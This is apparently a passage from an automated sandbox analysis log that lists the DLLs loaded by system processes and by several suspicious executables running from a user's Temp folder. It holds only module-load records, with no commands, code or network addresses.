Source: C:\Windows\System32\netsh.exe Section loaded: ktmw32.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mprmsg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wldp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Section loaded: mstask.dll
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Section loaded: dui70.dll
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Section loaded: duser.dll
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Section loaded: chartv.dll
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Section loaded: oleacc.dll
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Section loaded: atlthunk.dll
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Section loaded: explorerframe.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kdscli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe Section loaded: pcacli.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe Section loaded: sfc_os.dll
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: esent.dll
Source: C:\Windows\System32\svchost.exe Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exe Section loaded: upnp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exe Section loaded: miutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: usermgrcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: propsys.dll
Source: C:\Windows\System32\svchost.exe Section loaded: coremessaging.dll
Source: C:\Windows\System32\svchost.exe Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: vssapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: vsstrace.dll
Source: C:\Windows\System32\svchost.exe Section loaded: samcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: samlib.dll
Source: C:\Windows\System32\svchost.exe Section loaded: es.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: schannel.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Section loaded: d3d11.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Section loaded: dxgi.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Section loaded: resourcepolicyclient.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Section loaded: d3d10warp.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Section loaded: dxcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Section loaded: devobj.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Section loaded: vaultcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\netsh.exe Section loaded: ifmon.dll
Source: C:\Windows\System32\netsh.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mprapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rasmontr.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rasapi32.dll
Source: C:\Windows\System32\netsh.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rasman.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mfc42u.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rasman.dll
Source: C:\Windows\System32\netsh.exe Section loaded: authfwcfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: fwpolicyiomgr.dll
Source: C:\Windows\System32\netsh.exe Section loaded: firewallapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: fwbase.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dhcpcmonitor.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dot3cfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dot3api.dll
Source: C:\Windows\System32\netsh.exe Section loaded: onex.dll
Source: C:\Windows\System32\netsh.exe Section loaded: eappcfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\netsh.exe Section loaded: eappprxy.dll
Source: C:\Windows\System32\netsh.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\netsh.exe Section loaded: fwcfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: hnetmon.dll
Source: C:\Windows\System32\netsh.exe Section loaded: netshell.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nlaapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: netsetupapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: netiohlp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\netsh.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nettrace.dll
Source: C:\Windows\System32\netsh.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nshhttp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: httpapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nshipsec.dll
Source: C:\Windows\System32\netsh.exe Section loaded: userenv.dll
Source: C:\Windows\System32\netsh.exe Section loaded: activeds.dll
Source: C:\Windows\System32\netsh.exe Section loaded: polstore.dll
Source: C:\Windows\System32\netsh.exe Section loaded: winipsec.dll
Source: C:\Windows\System32\netsh.exe Section loaded: adsldpc.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nshwfp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: cabinet.dll
Source: C:\Windows\System32\netsh.exe Section loaded: p2pnetsh.dll
Source: C:\Windows\System32\netsh.exe Section loaded: p2p.dll
Source: C:\Windows\System32\netsh.exe Section loaded: profapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rpcnsh.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wcnnetsh.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wlanapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: whhelper.dll
Source: C:\Windows\System32\netsh.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wlancfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wshelper.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wevtapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wwancfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wwapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wcmapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rmclient.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mobilenetworking.dll
Source: C:\Windows\System32\netsh.exe Section loaded: peerdistsh.dll
Source: C:\Windows\System32\netsh.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\netsh.exe Section loaded: slc.dll
Source: C:\Windows\System32\netsh.exe Section loaded: sppc.dll
Source: C:\Windows\System32\netsh.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: ktmw32.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mprmsg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wldp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kdscli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe Section loaded: mpr.dll
